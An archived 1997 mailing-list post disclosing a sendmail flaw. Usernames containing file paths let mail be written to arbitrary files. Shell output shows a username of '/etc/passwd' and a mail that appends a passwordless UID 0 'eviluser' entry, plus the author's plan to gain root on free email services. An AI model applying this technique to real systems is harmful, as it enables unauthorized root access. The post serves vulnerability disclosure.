Going through my mail the other day, I noticed some junk mail from
..@somehost, and wondered what would happen if I had a user by the same
name. Well, it seems sendmail will readily write to a path in the username
as long as it doesn't begin with a forward slash. A few quick examples:
thePond:~# cat /etc/passwd | grep ../
../../a:*:519:100:tmp:/home/tmp:/bin/tcsh
thePond:~# ls -l /var/a
-rw------- 1 ../../a users 0 Nov 23 12:14 /var/a
thePond:/var/spool# ls -ld atjobs
drwxr-xr-x 2 root root 1024 Nov 23 11:55 atjobs
thePond:/var/spool# cat /etc/passwd | grep atjobs
../atjobs:*:520:100:tmp:/tmp:/bin/tcsh
thePond:/var/spool# ls -l
total 16
drwxr-xr-x 2 root root 1024 Nov 23 11:55 BOGUS.EYF
-rw------- 1 ../atjob users 0 Nov 23 12:20 atjobs
Yes, you can precede the pathname with a forward slash.
thePond:~# cat /etc/passwd | grep passwd
/etc/passwd:*:515:100:tmp:/home/tmp:
thePond:~# cat /etc/passwd
root:*:0:0:root:/root:/bin/tcsh
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
[Edited out more passwords..]
>From root Tue Nov 25 20:44:00 1997
To: /etc/passwd
eviluser::0:0:Sendmail quirks:/root:/bin/tcsh
This probably will not be a problem for the average user. However,
BBSes and free email services often let the user select his own username,
and will add him to /etc/passwd for email and whatnot. If I ran into a
site that did this, I could just specify my login as /etc/passwd and write
myself a new username, this time with UID:GID 0:0 :)
*---------------------------------*
| tiepilot - The Duck Jedi Master |
| |
| duckvaderat_private |
| tiepilotat_private |
*---------------------------------*
Never put off till tomorrow what you can avoid all together.
Hacker's Law:
The belief that enhanced understanding will necessarily stir a
nation to action is one of mankind's oldest illusions.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:34:01 PDT